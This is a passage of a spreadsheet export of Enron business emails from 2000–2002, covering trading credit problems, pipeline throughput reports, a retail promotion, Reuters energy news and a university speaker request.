deBoisblanc Denny/HOU/ECT@ECT, Mark Taylor/HOU/ECT@ECT, Jeffrey T _x000D_
Hodge/HOU/ECT@ECT_x000D_
cc: Brent A Price/HOU/ECT@ECT _x000D_
Subject: Aquila_x000D_
_x000D_
We need to know what the resolution plan is to getting Aquilia straight for _x000D_
trading Physical and Financial products.   Today we saw Aquilia Risk trade _x000D_
Next Day Physical Gas again and we were asked to move the deal to Aquilia _x000D_
Energy.  What is being done to get Aquilia Risk from continuing to enter _x000D_
Physical trades on line?  My concern for this trade was that we brought it to _x000D_
Credit's attention this morning and did not get final word to move the deal _x000D_
to Aquilia Energy until late in the day (4.45pm) which affects Logistics _x000D_
ability to nominate for next day business.  Logistics has been made aware of _x000D_
the late nom and will be working with the Pipe to get the nom in.  If there _x000D_
are issues with this late nom from the pipeline we will let you know._x000D_
_x000D_
I'm not comfortable with the internal process of  counterparty name changing _x000D_
of EOL deals and would like to get comfortable with how we are going to set _x000D_
this process up.  I think there should be legal review of all deals that we _x000D_
change and would suspect that some form of communication would need to be _x000D_
conveyed to the counterparty.  _x000D_
_x000D_
_x000D_
KC_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 7 Jan 2000 08:55:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'stinson.gibner@enron.com', 'paulo.issler@enron.com'})</t>
  </si>
  <si>
    <t>Day Rate Hedge</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Vince J Kaminski/HOU/ECT on 01/07/2000 _x000D_
04:55 PM ---------------------------_x000D_
_x000D_
_x000D_
John Peyton_x000D_
01/07/2000 01:45 PM_x000D_
To: Vince J Kaminski/HOU/ECT@ECT_x000D_
cc: Chris Hilgert/HOU/ECT@ect _x000D_
Subject: Day Rate Hedge_x000D_
_x000D_
Vince, _x000D_
_x000D_
Included is the rest of the prices for 4th and 5th Generation _x000D_
Semi-submersibles in the Gulf of Mexico.  The only additional Data is from _x000D_
Sept 99 through Dec 99._x000D_
_x000D_
Chris and I look forward to your analysis on Tuesday._x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 12 Apr 2001 01:34:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'nicole.cortez@enron.com'})</t>
  </si>
  <si>
    <t>Greeley Gas</t>
  </si>
  <si>
    <t>Here is the information Paul thought you would need for the exhibit you are _x000D_
working on for Greeley Gas.  Let me know if you need anything else._x000D_
_x000D_
Cap Release  CIG K#33222001_x000D_
Cap Release WIC K#41059040_x000D_
Agent on CIG K#33191010_x000D_
Agent on Young K#17003002_x000D_
_x000D_
_x000D_
Specified receipt points into CIG in WYO:_x000D_
Patrick Draw_x000D_
Table Rock Residue_x000D_
Table Rock Master Meter_x000D_
Desert Spring Master Meter_x000D_
Red Desert_x000D_
North Wamsutter_x000D_
Wamsutter Master Meter_x000D_
Echo Springs_x000D_
I-80_x000D_
Washakie_x000D_
Riner Road</t>
  </si>
  <si>
    <t>Fri, 13 Oct 2000 01:50:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Transwestern Weekly Report</t>
  </si>
  <si>
    <t>For the week  October 9-13th:_x000D_
_x000D_
Transwestern weekly average deliveries to California were 1,025 MMcf/d (94%) _x000D_
while east deliveries averaged 265 MMcf/d.  San Juan lateral throughput _x000D_
averaged 723 MMcf/d while receipts from Rio Puerco averaged 50 MMcf/d.  _x000D_
_x000D_
_x000D_
El Paso average deliveries to California were 2,200 MMcf/d (75%) :_x000D_
_x000D_
- PG&amp;ETop (capacity 1,140 MMcf/d) deliveries averaged 518 MMcf/d (45%)_x000D_
- SoCalEhr (capacity 1,250 MMcf/d) deliveries averaged 1,153 MMcf/d (92%)_x000D_
- SoCalTop (capacity 541 MMcf/d) deliveries averaged 529 MMcf/d (98%)_x000D_
_x000D_
_x000D_
Other pipeline throughput:_x000D_
_x000D_
- PGT ( capacity 1,937 MMcf/d) throughput to California averaged 1,737 MMc/d _x000D_
(91%) _x000D_
-  Kern River (capacity 700) throughput to California averaged 425 MMcf/d _x000D_
(60%)_x000D_
_x000D_
_x000D_
The cash PG&amp;E/Topock - SoCal/Needles spread shrank consistently from a Monday _x000D_
.48 difference to a Friday difference of .11_x000D_
_x000D_
Friday Enron Online Basis numbers:_x000D_
_x000D_
  Nov  Nov 00-March '01 April-Oct '01_x000D_
Perm-CA   .32    .31      .50_x000D_
SJ - CA    .66    .49      .72   _x000D_
SJ-Waha   .37    .21      .29_x000D_
Perm-Waha   .03    .03      .07</t>
  </si>
  <si>
    <t>Wed, 24 May 2000 04:10:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: SUMMER ANALYST INVITATION</t>
  </si>
  <si>
    <t xml:space="preserve">only if you go_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Shanna Husser@ENRON_x000D_
05/24/2000 08:09 AM_x000D_
To: Eric Bass/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: SUMMER ANALYST INVITATION_x000D_
_x000D_
Are you going to this?_x000D_
---------------------- Forwarded by Shanna Husser/Corp/Enron on 05/24/2000 _x000D_
08:08 AM ---------------------------_x000D_
   _x000D_
	_x000D_
	_x000D_
	From:  Cheryl Kuehl                           05/19/2000 03:27 PM_x000D_
	_x000D_
_x000D_
To: _x000D_
cc:  (bcc: Shanna Husser/Corp/Enron)_x000D_
_x000D_
Subject: SUMMER ANALYST INVITATION_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 9 Mar 2001 05:19:00 -0800 (PST)</t>
  </si>
  <si>
    <t>RE: The New Power Company (adm08126) --- ability to transact</t>
  </si>
  <si>
    <t>Griff, the headroom for this counterparty was set at zero pending the _x000D_
completion of a master and master netting agreements.  We are working on the _x000D_
issues related to this counterparty and will keep you posted as to any change _x000D_
in their status.  Thanks._x000D_
_x000D_
Walter_x000D_
 -----Original Message-----_x000D_
From:  Gray, Mary Griff  _x000D_
Sent: Friday, March 09, 2001 1:00 PM_x000D_
To: Guidroz, Walter; Tom Moran/HOU/ECT@ENRON_x000D_
Cc: Jones, Tana; William S Bradford/HOU/ECT@ENRON_x000D_
Subject: The New Power Company (adm08126) --- ability to transact_x000D_
_x000D_
Guys,_x000D_
_x000D_
I received a call from Mike Garred, admin for The New Power Company, wanting _x000D_
to confirm that his company is properly set up in EOL ---- everything is fine _x000D_
from our end.  What does this customer need to do to get credit?_x000D_
_x000D_
Thanks,_x000D_
Griff</t>
  </si>
  <si>
    <t>Thu, 1 Mar 2001 01:12:00 -0800 (PST)</t>
  </si>
  <si>
    <t>January Penalty Support - SWG</t>
  </si>
  <si>
    <t>Jane, I just faxed the January penalty support.  Also, you mentioned that we _x000D_
should be billing penalties on the trigger deal - 386140 (EPNG - Blanco _x000D_
Supply Area).  However, this deal is linked to the same contract as the _x000D_
penalty for the nomination error.  I have checked the contract again, and all _x000D_
of the exhibits are expired.  In addition, I cannot find an exhibit which _x000D_
covers EPNG-Blanco Supply Area.  Given this information, would you still like _x000D_
me to bill the penalty, and if so, at what rate?_x000D_
_x000D_
Thanks for your help_x000D_
Laurie</t>
  </si>
  <si>
    <t>Thu, 1 Nov 2001 14:57:23 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'chris.lambie@enron.com'})</t>
  </si>
  <si>
    <t>FW: EKT Positions</t>
  </si>
  <si>
    <t>_x000D_
They are wondering if we can help them with offsets for these positions...._x000D_
 -----Original Message-----_x000D_
From: 	"Conover, Curtis (EKT)" &lt;Curt.Conover@entergykoch.com&gt;@ENRON  _x000D_
Sent:	Tuesday, October 30, 2001 1:37 PM_x000D_
To:	'clambie@enron.com'_x000D_
Subject:	EKT Positions_x000D_
_x000D_
Chris,_x000D_
_x000D_
AECO:_x000D_
	LONG | 	SHORT_x000D_
2001               |_x000D_
Dec	          |      77.5  Contracts_x000D_
2002               |_x000D_
Jan                 |      93     Contracts_x000D_
Feb                 |      84     Contracts_x000D_
Mar                 |      93     Contracts_x000D_
April        45    |               Contracts_x000D_
May        46.5  |               Contracts_x000D_
June        45    |               Contracts_x000D_
July         31    |               Contracts_x000D_
Aug	  31     |               Contracts_x000D_
Sep         30    |               Contracts_x000D_
Oct         31    |                Contracts_x000D_
_x000D_
_x000D_
NWPL-Canadian (Sumas)_x000D_
	LONG |	SHORT_x000D_
2001	          |_x000D_
Dec	  14.9  |	               Contracts_x000D_
2002	          |_x000D_
Jan	  14.9  |	 	   Contracts_x000D_
Feb	          |	  28.6	   Contracts_x000D_
Mar	          |	  31.6 	   Contracts_x000D_
April	  14.4  |	  	   Contracts_x000D_
May	  14.9  |		   Contracts_x000D_
June	  14.4  |		   Contracts_x000D_
July	  14.9  |		   Contracts_x000D_
Aug	  14.9  |		   Contracts_x000D_
Sep  	  14.4  |		   Contracts_x000D_
Oct	  14.9  |		   Contracts_x000D_
Nov	          |  15.6	   Contracts_x000D_
Dec	          |   16.1	   Contracts_x000D_
2003	          |_x000D_
Jan	          |   16.1        Contracts_x000D_
Feb	          |	  14.6        Contracts_x000D_
Mar	          |   16.1         Contracts_x000D_
_x000D_
Let me know if you need any more information._x000D_
_x000D_
Thanks_x000D_
Curt Conover_x000D_
Entergy-Koch Trading, LP_x000D_
713-544-5150</t>
  </si>
  <si>
    <t>Wed, 21 Nov 2001 10:52:42 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'dealers@thesilverfund.com'})</t>
  </si>
  <si>
    <t>The Silver Fund - Holiday Season Georg Jensen Silver Flatware Sale!</t>
  </si>
  <si>
    <t>_x000D_
Dear Customer,_x000D_
_x000D_
		*** Holiday Season Flatware Sale! ***_x000D_
_x000D_
	 15% Off All Flatware until December 24th, 2001_x000D_
_x000D_
The Silver Fund is celebrating this festive time of year with 15% discount_x000D_
on all flatware orders received between now and December 24th, 2001._x000D_
_x000D_
ALSO_x000D_
_x000D_
SPECIAL CLEARANCE SALE_x000D_
_x000D_
	50% Off All Coffee Spoons_x000D_
_x000D_
This offer is good for all orders: online, phone, fax, mail or in person._x000D_
The Offer applies only to Georg Jensen Silver flatware (not Jewelry or_x000D_
Holloware) and is subject to availability._x000D_
_x000D_
Remember we pay any import duty on your behalf. You pay no sales tax._x000D_
_x000D_
We have the hard-to-find pieces you want now!_x000D_
It couldn't be easier!_x000D_
_x000D_
At www.thesilverfund.com?aid=11 you'll find a 50,000 piece inventory of the most_x000D_
coveted Georg Jensen Silver, including the widest choice of flatware in the_x000D_
world -- all 33 original Jensen flatware patterns.   This is the time to get_x000D_
the pieces you want most, including flatware from 22 patterns no longer_x000D_
made._x000D_
_x000D_
This is a terrific offer:_x000D_
_x000D_
		* Tell Us What You Want_x000D_
		* Save as Much as 70% on Retail Cost_x000D_
		* We Take Care of Everything_x000D_
_x000D_
Visit www.thesilverfund.com?aid=11 to order online via our secure website._x000D_
Call TOLLFREE on: 1-877-224-5230 - we are six hours ahead of US Eastern Time._x000D_
Fax us on: 011 44 207 839 8935._x000D_
Email us at: mailto:dealers@thesilverfund.com_x000D_
_x000D_
Don't miss out... you have until December 24th to take advantage of this_x000D_
special offer._x000D_
_x000D_
Seasons Greetings from The Silver Fund._x000D_
_x000D_
_x000D_
_x000D_
If you do not wish to hear from us again click the link, or copy it_x000D_
into your web browser's address field._x000D_
http://www.thesilverfund.com/mailinglist/unsubscribe.php?email=jeffrey.a.shankman@enron.com</t>
  </si>
  <si>
    <t>Sun, 3 Feb 2002 12:58:37 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'mitch.taylor@enron.com'})</t>
  </si>
  <si>
    <t>frozenset({'louise.kitchen@enron.com', 'jeff.golden@enron.com', 'jim.fallon@enron.com', 'rich.dimichele@enron.com', 'greg.whalley@enron.com'})</t>
  </si>
  <si>
    <t>RE: Transition Services Agreement</t>
  </si>
  <si>
    <t>Can we have a meeting at 9:00AM Monday morning to discuss the Transition Services.  I will try to get conference room 49c1.  _x000D_
Jim, please invite anyone else from your team that you feel would be helpful._x000D_
_x000D_
Mary, we will plan on patching you in by phone._x000D_
_x000D_
Mitch_x000D_
_x000D_
_x000D_
_x000D_
-----Original Message-----_x000D_
From: Kitchen, Louise _x000D_
Sent: Saturday, February 02, 2002 6:28 PM_x000D_
To: Golden, Jeff; Whalley, Greg_x000D_
Cc: Muller, Mark S.; Taylor, Mitch; Schuler, Lance (Legal)_x000D_
Subject: RE: Transition Services Agreement_x000D_
_x000D_
_x000D_
Just give us a time._x000D_
_x000D_
Thanks_x000D_
_x000D_
Louise_x000D_
_x000D_
-----Original Message-----_x000D_
From: Golden, Jeff _x000D_
Sent: Friday, February 01, 2002 9:17 PM_x000D_
To: Whalley, Greg_x000D_
Cc: Muller, Mark S.; Taylor, Mitch; Schuler, Lance (Legal); Kitchen,_x000D_
Louise_x000D_
Subject: FW: Transition Services Agreement_x000D_
_x000D_
_x000D_
Greg,_x000D_
_x000D_
I'm sure mitch and I would be happy to help broker this...I'm sure its getting the right people at the table for an hour.  I'd suggest fallon, louise, lance and mary korby from weil.  Any ohers?_x000D_
_x000D_
Jeff_x000D_
--------------------------_x000D_
Jeff Golden_x000D_
_x000D_
_x000D_
-----Original Message-----_x000D_
From: Schuler, Lance (Legal) &lt;Lance.Schuler-Legal@ENRON.com&gt;_x000D_
To: Taylor, Mitch &lt;Mitchell.Taylor@ENRON.com&gt;; Golden, Jeff &lt;Jeff.Golden@ENRON.com&gt;_x000D_
Sent: Fri Feb 01 15:06:02 2002_x000D_
Subject: FW: Transition Services Agreement_x000D_
_x000D_
I am going to need you guys to help weigh in.  Thanks.  Lance._x000D_
_x000D_
W. Lance Schuler_x000D_
Enron North America Corp._x000D_
1400 Smith Street_x000D_
Houston, Texas  77002_x000D_
Phone: 713/853-5419_x000D_
Fax:  281/664-4890_x000D_
Email:  lance.schuler-legal@enron.com_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Racicot, Paul  _x000D_
Sent:	Friday, February 01, 2002 3:04 PM_x000D_
To:	Fallon, Jim_x000D_
Cc:	Schuler, Lance (Legal); Sager, Elizabeth; Miller, Don (Asset Mktg); Dimichele, Rich_x000D_
Subject:	Transition Services Agreement_x000D_
_x000D_
_x000D_
_x000D_
Jim,_x000D_
_x000D_
There is a lot of confusion over the scope and scale of services that the estate will require from UBS over the next several months.  During the negotiations over the Transistion Services Agreement, it was clearly contemplated that the estate will need UBS to schedule and purchase power as an agent of the estate.  However, most of the UBS team does not understand or expect to provide these types of services.  I know that you have coordinated with Greg Whalley but I feel it is necessary that we have a broader coordination meeting between the two organizations.  I think this meeting needs to happen at your level._x000D_
_x000D_
Thanks,_x000D_
_x000D_
Paul</t>
  </si>
  <si>
    <t>Tue, 10 Apr 2001 03:28:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: morning 4/10</t>
  </si>
  <si>
    <t>Good morning. I'm at EOTT .  Talk with you later._x000D_
_x000D_
Stan</t>
  </si>
  <si>
    <t>Mon, 23 Jul 2001 09:16:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Original DA proposal</t>
  </si>
  <si>
    <t>_x000D_
Sue Mara_x000D_
Enron Corp._x000D_
Tel: (415) 782-7802_x000D_
Fax:(415) 782-7854</t>
  </si>
  <si>
    <t>Wed, 15 Aug 2001 17:48:26 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'louise.kitchen@enron.com', 'ted.murphy@enron.com', 'rick.buy@enron.com', 'greg.whalley@enron.com', 'cassandra.schultz@enron.com', 'david.port@enron.com'})</t>
  </si>
  <si>
    <t>Final 8/14/01 Gas Violation</t>
  </si>
  <si>
    <t xml:space="preserve">Attached is the Enron Americas GasTrading violation memo for  Maturity Gap Risk for August 14, 2001.  The Office of the Chairman for Enron Americas is responsible for printing out a hard copy of this memo, signing and returning the hard copy to Chris Abel at 3560f, who will forward it to RAC to obtain their signature. _x000D_
_x000D_
Thank You_x000D_
_x000D_
 _x000D_
 </t>
  </si>
  <si>
    <t>Thu, 28 Sep 2000 08:49:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'dana@gablegroup.com'})</t>
  </si>
  <si>
    <t>Re: Prelim. Proposal for ARM</t>
  </si>
  <si>
    <t>Thanks.  Best of luck.  Don't hesitate to call if there's anything you need.  _x000D_
Look forward to getting down to S.D. soon.  Maybe we can talk Jessie into _x000D_
having a drink. _x000D_
_x000D_
Best,_x000D_
Jeff</t>
  </si>
  <si>
    <t>Mon, 21 May 2001 08:06:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: Gordon Grimes</t>
  </si>
  <si>
    <t xml:space="preserve">Thanks_x000D_
_x000D_
_x000D_
_x000D_
	Stuart Zisman_x000D_
	05/21/2001 02:15 PM_x000D_
		 _x000D_
		 To: Richard B Sanders/HOU/ECT@ECT_x000D_
		 cc: _x000D_
		 Subject: Gordon Grimes_x000D_
_x000D_
I spoke with Gordon.  The assets that he knew about were ones that we have _x000D_
already looked at.  I was very nice and told him that I was appreciative of _x000D_
his notifying us about them.  _x000D_
_x000D_
I owe him a call to tell him whether we are still pursuing these projects or _x000D_
whether we have given up on them.  Gordon wanted to be sure that we had no _x000D_
interest before bringing these projects to his other clients' attention._x000D_
_x000D_
Stuart_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 25 Oct 2000 07:15:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'elizabeth.linnell@enron.com', 'keith.miceli@enron.com', 'jeannie.mandelker@enron.com', 'mark.palmer@enron.com', 'karen.denne@enron.com', 'meredith.philipp@enron.com', 'eric.thode@enron.com', 'laura.schwartz@enron.com', 'damon.harvey@enron.com', 'mary.clark@enron.com', 'steven.kean@enron.com'})</t>
  </si>
  <si>
    <t>GERMANY: European power trading set to grow further - Enron</t>
  </si>
  <si>
    <t xml:space="preserve">GERMANY: European power trading set to grow further - Enron._x000D_
_x000D_
10/25/2000_x000D_
Reuters English News Service_x000D_
(C) Reuters Limited 2000._x000D_
_x000D_
FRANKFURT, Oct 25 (Reuters) - The volume of electricity trades will continue _x000D_
to expand in continental Europe, a senior Enron executive said on Wednesday. _x000D_
"Portfolio shifts as well as high oil and dollar prices will continue to _x000D_
boost the number of transactions," Gregor Baeumerich, Enron's head of _x000D_
continental European power trading, told an IIR conference on energy trade. _x000D_
"There are no natural limits to market growth."_x000D_
According to Enron estimates, German, Austrian and Swiss power trades in 2000 _x000D_
will amount to a combined 1,500 terawatt hours (TWh) - versus actual _x000D_
consumption of 975 TWh - of which Enron will account for around 375 TWh. _x000D_
Although the underlying physical demand was not growing, the process of _x000D_
market liberalisation had already caused a dramatic acceleration in trading _x000D_
activities, said Baeumerich. _x000D_
Enron's continental European turnover of 136,7 TWh in the third quarter of _x000D_
2000 represented a 10-fold increase over the corresponding 1999 quarter. _x000D_
The number of market participants - counting traders, exchanges and new _x000D_
trading floors at established energy companies such as municipal utilities - _x000D_
in that period had risen to 180 from 100 a year ago, according to Enron _x000D_
estimates. _x000D_
In future, the number of new entrants would offset those participants lost _x000D_
due to the simultaneous concentration process, Enron believed. _x000D_
Trade in transmission contracts for a variety of time periods were now _x000D_
established both over the counter and at electricity exchanges in Germany, _x000D_
the biggest market in its own right, Baeumerich said. _x000D_
Next year should also see the emergence of power options. _x000D_
But on Enron's wish list for improved German trading conditions were clear _x000D_
rules on how to handle bottlenecks at border entrance points, he added. _x000D_
Enron also wanted export and import fees to be waived and traders allowed to _x000D_
apply for transmission schedules from grid operators after the currently _x000D_
observed 1430 local time deadline. _x000D_
Instead, Enron favours short-term trading with a one hour lead time - for _x000D_
example in response to sudden weather changes which impact on electricity _x000D_
needs. _x000D_
Baeumerich also reported that usage of Enron's online trading platform for _x000D_
power, gas, and coal, introduced a year ago, already accounted for 60 percent _x000D_
of total worldwide turnover. In Europe, the figure was 50 percent._x000D_
_x000D_
Copyright , 2000 Dow Jones &amp; Company, Inc. All Rights Reserved. </t>
  </si>
  <si>
    <t>Tue, 28 Aug 2001 16:06:06 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'michael.terraso@enron.com', 'j.kaminski@enron.com'})</t>
  </si>
  <si>
    <t>RE: Speaker from Enron</t>
  </si>
  <si>
    <t>Mike -- how about Lisa Jacobson?_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Kaminski, Vince J  _x000D_
Sent:	Monday, August 27, 2001 8:24 AM_x000D_
To:	Terraso, Michael_x000D_
Cc:	Kean, Steven J._x000D_
Subject:	RE: Speaker from Enron_x000D_
_x000D_
Mike,_x000D_
_x000D_
I think it makes sense to send somebody from Enron to make a presentation,_x000D_
given our relationship with the Wharton School. I  think it can be somebody_x000D_
below Steve's level - the occasion does not justify allocating_x000D_
time of a senior executive._x000D_
_x000D_
Vince_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Terraso, Michael  _x000D_
Sent:	Monday, August 27, 2001 7:57 AM_x000D_
To:	Kaminski, Vince J_x000D_
Subject:	FW: Speaker from Enron_x000D_
_x000D_
Vince, What is your opinion regarding the value of making a presentation?  Mike_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Kean, Steven J.  _x000D_
Sent:	Friday, August 24, 2001 12:45 PM_x000D_
To:	Terraso, Michael_x000D_
Cc:	Kaminski, Vince J_x000D_
Subject:	RE: Speaker from Enron_x000D_
_x000D_
Please discuss with Vince.  I don't know how to engage relative importance_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Terraso, Michael  _x000D_
Sent:	Friday, August 24, 2001 11:25 AM_x000D_
To:	Kean, Steven J._x000D_
Subject:	RE: Speaker from Enron_x000D_
_x000D_
Steve, if you think it would be of value to have someone speak  on at the Wharton School Energy Club, I can develop a presentation addressing the topic Global Warming and the Energy Industry.  Mike_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Kean, Steven J.  _x000D_
Sent:	Friday, August 24, 2001 7:22 AM_x000D_
To:	Terraso, Michael_x000D_
Subject:	FW: Speaker from Enron_x000D_
_x000D_
_x000D_
Look at the topic below.  Should we send somebody?_x000D_
 -----Original Message-----_x000D_
From: 	Kaminski, Vince J  _x000D_
Sent:	Thursday, August 23, 2001 5:43 PM_x000D_
To:	Kean, Steven J._x000D_
Cc:	Patrick, Christie_x000D_
Subject:	FW: Speaker from Enron_x000D_
_x000D_
Steve,_x000D_
_x000D_
I have received an inquiry from a professor at the Wharton School who_x000D_
would like to invite a senior executive from Enron to speak at their_x000D_
Energy Club. I gave him your name, so you can expect a call from him or one_x000D_
of his associates._x000D_
_x000D_
Sorry if I put another burden on your shoulders._x000D_
_x000D_
Vince_x000D_
_x000D_
_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	"Kleindorfer, Paul" &lt;kleindorfer@wharton.upenn.edu&gt;@ENRON [mailto:IMCEANOTES-+22Kleindorfer+2C+20Paul+22+20+3Ckleindorfer+40wharton+2Eupenn+2Eedu+3E+40ENRON@ENRON.com] _x000D_
Sent:	Thursday, August 23, 2001 11:58 AM_x000D_
To:	'vkamins@enron.com'_x000D_
Subject:	FW: Speaker from Enron_x000D_
_x000D_
Vince:_x000D_
_x000D_
We are moving along on the weather derivatives project.  Had a good meeting with Joe Hrgovic and others on the project and we are now interviewing a number of distribution utilities._x000D_
_x000D_
On another note, our Energy Club is fairly active at Wharton and would be very interested in featuring Terence Thorn if he is still with Enron (or your senior Government Affairs person if Mr. Thorn has left Enron).  Could you kindly let me know how to contact Mr. Thorn (or his replacement) so I can speak with him/her briefly.  My alterior motive in asking you to do this is that you might copy him on your email to me so that he knows we are doing some work together._x000D_
_x000D_
Thanks in advance._x000D_
_x000D_
Paul_x000D_
_x000D_
-----Original Message-----_x000D_
From: Richard, Amy [mailto:amyricha@wharton.upenn.edu]_x000D_
Sent: Wednesday, August 22, 2001 4:18 PM_x000D_
To: 'kleindorfer@wharton.upenn.edu'_x000D_
Subject: Speaker from Enron_x000D_
_x000D_
_x000D_
Paul,_x000D_
_x000D_
The speaker from Enron that I told you yesterday that I was interested in bringing in for the Energy Club Speaker Series is Terence H. Thorn, senior vice president, Environmental and International Government Affairs. A colleague of mine heard him speak in Kyoto in 1997 and said he gave a superb talk. As of 2000 he was still in this position, though I could not verify that he is now._x000D_
_x000D_
The proposed topic is Global Warming Policy and the Energy Industry._x000D_
---How will the Bonn agreement affect global strategy? What will be the near-term and long-term consequences of the agreement?_x000D_
---How does US non-participation affect US market strategies versus strategies in participating countries?_x000D_
---What is Enron's current position on global greenhouse gas policy? How is Enron managing and hedging this position?_x000D_
---How will developing country energy markets participate in greenhouse gas mitigation?_x000D_
_x000D_
The Energy Club Speaker Series takes place every other Monday from 4:30 to 6:30. There are a number of dates open during Fall semester._x000D_
_x000D_
I appreciate very much your help in trying to arrange this. Please let me know if there is any other information you need._x000D_
_x000D_
Thank you,_x000D_
Amy_x000D_
_x000D_
_x000D_
_x000D_
-----Original Message-----_x000D_
From: Robbins, Michael C_x000D_
To: Richard, Amy_x000D_
Sent: 8/22/2001 1:14 PM_x000D_
Subject: RE: enron_x000D_
_x000D_
Hi Amy,_x000D_
Did a little search on Enron's website and happened upon the guy's name._x000D_
Terence H. Thorn, senior vice president, Environmental and International_x000D_
Government Affairs. Not sure if he is still with the company but see_x000D_
what your professor thinks. I will try to get my hands on his paper from_x000D_
the March 1997 meeting as well._x000D_
_x000D_
Michael_x000D_
_x000D_
-----Original Message-----_x000D_
From: Richard, Amy_x000D_
To: Robbins, Michael C_x000D_
Sent: 8/21/2001 6:28 PM_x000D_
Subject: enron_x000D_
_x000D_
Hi Michael_x000D_
_x000D_
Remember we talked about the Kyoto conference and you said you heard the_x000D_
Govt Affairs guy at Enron give an amazing speech about global warming? I_x000D_
ran the idea to get a speaker on global warming by the 2nd yr in charge_x000D_
of the Energy Club (http://dolphin.upenn.edu/~energy), and he thought_x000D_
that would be great. And furthermore, the prof who I do research_x000D_
for(Paul Kleindorfer)said he is very well connected with the big guys at_x000D_
Enron and would love to jointly sponsor the talk. SO, do you remember_x000D_
the guy's name? Was it Robert Reilly possibly? I don't know if he would_x000D_
still be there but we can try._x000D_
_x000D_
Thanks-_x000D_
Amy Richard</t>
  </si>
  <si>
    <t>Thu, 24 Jan 2002 13:35:42 -0800 (PST)</t>
  </si>
  <si>
    <t>BNP PARIBAS Commodity Futures NG MarketWatch For 01/24/02</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
(See attached file: g012402.pdf)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_x000D_
_x000D_
 - g012402.pdf </t>
  </si>
  <si>
    <t>Mon, 9 Oct 2000 02:28:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Utilities, Electric: Deregulation: USA: Calif. utilities seek ISO_x000D_
 power price cap cut to ...</t>
  </si>
  <si>
    <t xml:space="preserve">----- Forwarded by Miyung Buster/ENRON_DEVELOPMENT on 10/09/2000 09:27 AM _x000D_
-----_x000D_
_x000D_
	djcustomclips@djinteractive.com_x000D_
	10/04/2000 04:25 PM_x000D_
	Please respond to nobody_x000D_
		 _x000D_
		 To: 86464@WCTOPICS.djnr.com_x000D_
		 cc: _x000D_
		 Subject: Utilities, Electric: Deregulation: USA: Calif. utilities seek ISO _x000D_
power price cap cut to ..._x000D_
_x000D_
_x000D_
 _x000D_
Reuters_x000D_
USA: Calif. utilities seek ISO power price cap cut to $100. _x000D_
? _x000D_
10/04/2000 _x000D_
Reuters English News Service _x000D_
(C) Reuters Limited 2000. _x000D_
_x000D_
SAN FRANCISCO, Oct 4 (Reuters) - Pacific Gas and Electric Co (PG&amp;E) said _x000D_
Wednesday it is joining with Southern California Edison and a California _x000D_
consumer group to seek a reduction of the Independent System Operator (ISO) _x000D_
price cap for electricity to $100.00 per megawatt hour (MWh) from the current _x000D_
$250.00 cap._x000D_
_x000D_
PG&amp;E, the utility subsidiary of San Francisco-based PGOCorp. , proposed the _x000D_
lower price cap as part of a broader package of steps it is taking to "make _x000D_
sure the California power market can operate more efficiently," a company _x000D_
official told reporters at a briefing here. _x000D_
_x000D_
Southern California Edison is the utility subsidiary of Edison International _x000D_
, based in Rosemead, Calif._x000D_
_x000D_
PGOsaid the request was backed by The Utility Reform Network (TURN), a San _x000D_
Francisco-based consumer group that has protested against soaring electricity _x000D_
prices as a result of California's bid to deregulate its electricity industry._x000D_
_x000D_
The California ISO, established as part of the deregulation effort, oversees _x000D_
the operation of about 75 percent of the state's power grid, serving some 27 _x000D_
million people._x000D_
_x000D_
The move by PGOand Edison follows a summer of chaos in the California power _x000D_
market, where a shortage of electricity generated within the state and open _x000D_
market power pricing sent the cost of wholesale power to nearly twice its _x000D_
historical average, frequently trading above the proposed $100.00 cap. _x000D_
_x000D_
Folder Name: Utilities, Electric: Deregulation _x000D_
Relevance Score on Scale of 100: 97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Company, Inc. All Rights Reserved </t>
  </si>
  <si>
    <t>Thu, 8 Mar 2001 07:48:00 -0800 (PST)</t>
  </si>
  <si>
    <t>(MS-15) NOTICE OF INTENTION TO TRANSFER</t>
  </si>
  <si>
    <t xml:space="preserve">March 8, 2001_x000D_
Notice # MS-15_x000D_
_x000D_
NOTICE OF INTENTION TO TRANSFER_x000D_
_x000D_
Please be advised that effective with the close of business, March 8, 2001,=_x000D_
=20_x000D_
the following member(s) have given notice of intention to transfer their so=_x000D_
le=20_x000D_
Membership within the Exchange:_x000D_
_x000D_
Peter Hillyard_x000D_
(Barclays Bank PLC)_x000D_
_x000D_
Peter V. Grotezinger_x000D_
(Valero Mktg. &amp; Supply)_x000D_
_x000D_
John L. Wilson_x000D_
(Valero Mktg. &amp; Supply)_x000D_
_x000D_
Thomas DeLoach_x000D_
(Mobil Oil Group)_x000D_
_x000D_
Michael Goldberg_x000D_
(Mobil Trading B.V.)_x000D_
_x000D_
John Simpson_x000D_
(Mobil Trading B.V.)_x000D_
_x000D_
